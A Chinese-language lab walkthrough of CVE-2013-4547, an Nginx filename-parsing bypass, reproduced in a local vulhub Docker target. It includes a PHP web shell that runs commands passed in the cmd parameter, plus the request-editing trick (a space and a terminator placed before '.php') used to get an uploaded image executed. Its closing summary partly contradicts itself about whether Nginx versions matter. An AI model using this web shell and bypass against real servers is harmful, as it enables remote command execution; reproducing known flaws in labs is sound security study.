漏洞原理
CVE-2013-4547漏洞是由于非法字符空格和截止符导致Nginx在解析URL时的有限状态机混乱,导致攻击者可以通过一个非编码空格绕过后缀名限制。假设服务器中存在文件1. jpg,则可以通过改包访问让服务器认为访问的为PHP文件。
漏洞复现
开启靶场
进入/vulhub/nginx/CVE-2013-4547,启动靶场环境:
docker-compose up -d
然后访问目标主机的8080端口
http://192.168.61.131:8080/
演示
验证漏洞
先上传正常的png图片,发现上传成功并且会显示文件路径
试试上传php文件,会不让上传
上传带有php代码的png图片并且抓包,在文件名后添一个空格,看到返回包中显示了上传成功的文件
<?php phpinfo(); ?>
访问shell.png
http://192.168.61.131:8080/uploadfiles/shell.png...php
抓包把 ...php 前面的两个 . 改成一个空格一个截断符
漏洞利用
上传木马
<?php
$a = $_GET["cmd"];
system($a);
?>
上传带有php代码的图片文件a.png,然后抓包后在文件名后加一个空,看到返回包显示了文件路径
然后访问下面路径,再进行抓包
http://192.168.61.131:8080/uploadfiles/a.png...php?cmd=whoami
抓包把 ...php 前面的两个 . 改成一个空格一个截断符,发现返回包执行了whoami的命令
执行ls命令
执行id命令
执行ping命令
总结
这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
配置不当:该漏洞与 Nginx、php 版本无关,属于用户配置不当造成的解析漏洞。
CVE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7